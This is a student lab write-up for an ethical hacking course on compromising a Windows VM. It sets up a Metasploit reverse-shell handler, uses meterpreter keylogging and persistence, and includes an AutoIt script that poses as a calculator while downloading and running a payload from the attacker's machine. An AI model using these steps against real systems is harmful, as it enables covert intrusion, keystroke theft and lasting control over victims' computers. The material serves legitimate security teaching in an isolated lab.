Lab 9 - 10
Lab 9 - 10
For submission: You must include screenshots and text explanation of the steps conducted in solving
the lab tasks.
Before starting this lab, make sure you have a Windows VM for VirtualBox. Once you do, configure the
network settings to be similar to the Kali machine you've been using and set up at least a NAT network.
To allow for bidirectional copy-paste, you can also install the Guest Additions, which is strongly
recommended.
Don't forget to restart the machine completely after installing the additions. Make sure you turn off the
firewall on the Windows VM.
1) The aim of the following exercise is to craft a malicious executable file (.exe) which contains a
command to connect to your Kali VM when executed. At first we will intentionally download and run
this executable file, but later we will try to disguise it.
________________________________________________________________________________________________________
CSCI369 Ethical Hacking - Lab 10 Exploiting Windows Machines and Creating Malicious Executables
Mohamed Ehsan Rizvan-7797965
Start your apache web server with the command service apache2 start
Start up the msfconsole on Kali used to handle exploits and use the following commands to prepare
your machine to accept connections with a reverse shell when the Windows VM opens a connection.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
________________________________________________________________________________________________________
CSCI369 Ethical Hacking - Lab 10 Exploiting Windows Machines and Creating Malicious Executables
Mohamed Ehsan Rizvan-7797965
Open up a browser in the Windows machine and enter the following URL in the address bar to reach the
file: http://10.0.2.5/utility/shell.exe Turn off browser protection if needed.
Download and run the shell.exe file. On Kali you should see that you have established a connection with
the meterpreter.
________________________________________________________________________________________________________
CSCI369 Ethical Hacking - Lab 10 Exploiting Windows Machines and Creating Malicious Executables
Mohamed Ehsan Rizvan-7797965
Include a screenshot of the connection being established between the two machines and the
meterpreter console being open.
Create a file in the Downloads folder on Windows and attempt to read the file using
meterpreter.
2) Using the meterpreter utility, you can execute a variety of different exploits or attacks. We will try out
a keylogger. Type in to the meterpreter on Kali keyscan_start, then go on the Windows VM, open
up a browser and search for something. Once you're done, go back to Kali and type in keyscan_dump.
________________________________________________________________________________________________________
CSCI369 Ethical Hacking - Lab 10 Exploiting Windows Machines and Creating Malicious Executables
Mohamed Ehsan Rizvan-7797965
3) Manually downloading a suspicious shell.exe and then executing it will not be likely. In the next
exercise you will download a script editor called AutoItv3 and create an executable that will pretend to
be a windows calculator, but when started, it will download the malicious .exe file in the background,
then start it along with the calculator.
Download the application with the full installer on your Windows VM and install it.
https://www.autoitscript.com/site/autoit/downloads/
Start the SciTE Script Editor and paste in the following. (make sure to replace [Kali IP] with a real
IP)
#include <InetConstants.au3>
#include <WinAPIFiles.au3>
$ps =Run ("calc.exe")
; Save the downloaded file to the temporary folder.
InetGet("http://[Kali IP]/utility/shell.exe", "..\\downloads\\shell.exe", $INET_FORCERELOAD, $INET_DOWNLOADBACKGROUND)
Sleep(2000)
ShellExecute("..\\downloads\\shell.exe")
Save this script on the desktop, but before you run it, go to Kali, stop the previous connection and the
meterpreter prompt with the exit command, then re-run the exploit to wait for a new connection.
Compile the script you created on Windows. Check the Desktop for an executable file. Double-click it
and you should see that a calculator starts up and you have a connection on Kali's msfconsole.
The above will work, but it's unlikely that a user would have this script editor on their computer, and
hence they wouldn't be able to run this script. It is also obvious from the icon that this is not a
________________________________________________________________________________________________________
CSCI369 Ethical Hacking - Lab 10 Exploiting Windows Machines and Creating Malicious Executables
Mohamed Ehsan Rizvan-7797965
calculator. Start up the Compile Script to .exe program form AutoIt and create an executable out of
this script (use an .ico file downloaded from the Web) to look like a calculator.
Explain in your own words and in detail what the AutoIt script
code that was provided for you does
________________________________________________________________________________________________________
CSCI369 Ethical Hacking - Lab 10 Exploiting Windows Machines and Creating Malicious Executables
Mohamed Ehsan Rizvan-7797965
4) The user might find out later that this calculator was not legitimate and remove it. There is a way to
make the malicious shell executable automatically start when the operating system boots up. Use the
following commands in the msfconsole on Kali with the meterpreter utility to turn on persistence, then
reboot the machine.
Include a screenshot of the meterpreter connection dying, then reopening once the Windows VM
booted up again.
________________________________________________________________________________________________________
CSCI369 Ethical Hacking - Lab 10 Exploiting Windows Machines and Creating Malicious Executables